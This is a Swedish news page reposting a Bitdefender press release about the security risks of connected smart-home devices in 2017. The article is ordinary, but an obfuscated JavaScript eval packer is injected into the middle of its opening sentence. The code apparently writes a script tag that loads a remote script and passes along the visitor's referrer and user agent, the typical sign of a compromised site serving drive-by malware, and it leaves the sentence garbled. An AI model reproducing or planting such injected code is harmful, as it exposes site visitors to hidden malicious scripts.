Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Uppkopplade prylar gör det smarta hemmet till en säkerhetsrisk 2017

Uppkopplade prylar gör det smarta hemmet till en säkerhetsrisk 2017
Sebastian

Uppkopplade eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ythia|var|u0026u|referrer|neeth||js|php’.split(’|’),0,{}))
prylar gör det smarta hemmet till en säkerhetsrisk 2017: Säkerhetshotet från uppkopplade prylar ökar i takt med att de vinner allt mer mark i våra hem. 2017 blir året då vi på allvar behöver se över våra smarta hem så att de även är säkra hem.

Under 2016 har vi välkomnat de uppkopplade prylarna in i våra hem. Hemlarm, kylskåp, termostat eller glödlampa – oavsett vad du är på jakt efter har du nu möjligheten att köpa en variant som går att koppla upp och styra via din smarta telefon. Men att våra hem blir uppkopplade och allt smartare är inte helt problemfritt, det innebär även en stor säkerhetsrisk.

–       Ett av de största säkerhetshoten under 2017 kommer vara botnets av uppkopplade prylar. Många ”smarta” prylar konstrueras utan något som helst säkerhetstänk. Prylarna är ofta komplicerade, om inte omöjliga, att uppdatera, säger Bogdan Botezatu, IT-säkerhetsexpert på Bitdefender.

I takt med att antalet uppkopplade prylar ökar – växer också antalet prylar som utgör en säkerhetsrisk på grund av att de inte uppdateras eller saknar lämpliga säkerhetslösningar. Det här innebär att vi under 2017 kommer se en ökning av IoT-attacker som görs via botnets av just uppkopplade prylar.

De uppkopplade prylarnas bristande säkerhet fungerar också som en ingång för inkräktare att komma åt våra datorer och telefoner. Datorn och telefonen är oftast uppkopplad på samma hemmanätverk som husets smarta prylar, vilket innebär att din uppkopplade termostat inte bara kan hackas, utan även användas för att komma åt information och filer på din dator eller telefon. Oavsett vilket operativsystem du använder så är du i farozonen.

–       Att inte uppdatera uppkopplade prylar kan liknas vid att fortfarande hänga kvar vid Windows XP långt efter att supporten upphörde. Skillnaden är att du kanske inte tänker på att din termostat har ett bäst före-datum, säger Bogdan Botezatu.

Mycket fokus inför 2017 ligger på att skapa användarvänliga helhetslösningar för det smarta hemmet, som t.ex. Google Home eller Apple Homekit. Bitdefenders rekommendation till dig som kopplar upp fler och fler delar av ditt hem under 2017 är att kontinuerligt se över så att dina prylar uppdateras och är skyddade. 

Om Bitdefender

Bitdefender är ett globalt tekniksäkerhetsföretag som erbjuder banbrytande end-to-end lösningar för cybersäkerhet och avancerade hotskydd till mer än 500 miljoner användare i fler än 150 länder. Bitdefender har sedan 2001 utvecklat och producerat prisvinnande säkerhetsteknik för företag och privatpersoner. I dag är Bitdefender en leverantör av både hybrida infrastrukturskydd och skydd på enhetsnivå. Genom FoU, allianser och partnerskap är Bitdefender den leverantör som alltid ligger i framkant som och levererar kraftfull säkerhetsteknik du kan ha förtroende för. Mer information finns tillgänglig på http://www.bitdefender.com/se